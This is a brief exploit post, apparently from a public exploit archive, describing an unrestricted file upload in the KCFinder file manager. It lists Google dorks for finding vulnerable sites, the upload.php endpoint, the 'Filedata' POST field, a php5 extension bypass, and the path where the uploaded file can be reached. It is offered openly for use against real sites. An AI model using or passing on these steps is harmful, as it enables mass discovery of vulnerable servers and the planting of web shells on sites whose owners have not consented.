Fresh exploit KCfinder

/////////////////////////////////////////////////
# Exploit Title: Fresh exploit KCfinder
# Google Dork:
      inurl:/assets/file_upload/admin/
      inurl:/assets/file_upload/hacker/
# Date: 28 / 08 / 2018
# Exploit Author: SpecimenT
# Vendor Homepage: https://kcfinder.sunhater.com
# Team: Dark Pinus Squad
# Tested on: Mozilla firefox 40.0 Windows 7 ultimate x64
************************************************
{+} search the dork in google search engine or other
{+} open target
{+} exploit : localhost/assets/tools/kcfinder/upload.php
{+} vuln ? blank
{+} open CSRF HERE
       post file = Filedata
       upload file ext php5 or other ( bypass ext )
{+} Access file : /assets/file_upload/hacker/files/file.php5
***********************************************
thanks to all Friends
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Share This :